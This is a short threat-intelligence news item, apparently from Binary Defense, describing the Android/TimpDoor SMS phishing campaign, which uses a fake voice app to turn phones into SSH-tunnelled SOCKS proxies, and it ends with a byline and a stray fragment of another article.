Researchers discovered a new active phishing campaign that is targeting Android based devices to turn them into mobile proxies. The campaign is spreading Android/TimpDoor, which is a malicious APK that is disguised as a voice application. The malware spreads via text messages that contain a malicious link to the fake application. It’s believed that the campaign has been active since the end of March. Victim’s receive a text message saying that they have two messages to review, however they have to click the link in order to do so. If the link is clicked, the victim will be taken to a fake web page that tries to trick victims into being a “popular classified advertisement website.” The page also tries to get the victim to install the app. The web page contains instructions that explain how to disable “Unknown Sources” in order for successful installation. Once the app is installed, it appears to be a basic voice software. It has no functionality beyond hosting a few fake audio files. If closed, the app’s icon is hidden, and the background process starts creating the proxy and collecting information about the device. Network traffic will then be sent through an encrypted connection via an SSH tunnel which allows potential access to internal networks and bypasses network security mechanisms. According to researchers, “Once the device information is collected, TimpDoor starts a secure shell (SSH) connection to the control server to get the assigned remote port by sending the device ID, this port will be later used for remote port forwarding with the compromised device acting as a local Socks proxy server.” There have been 26 TimpDoor variants seen but researchers believe that the malware still needs work before it could be a wider threat.
Written by: Nataliia Zdrok, Threat Intelligence Analyst at Binary Defense Russia’s invasion of Ukraine increased